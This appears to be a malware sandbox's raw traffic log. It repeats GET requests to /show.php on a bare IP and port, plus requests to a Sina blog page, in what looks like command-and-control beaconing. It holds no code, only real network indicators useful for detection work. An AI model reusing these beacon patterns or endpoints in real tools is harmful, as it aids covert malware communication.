Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
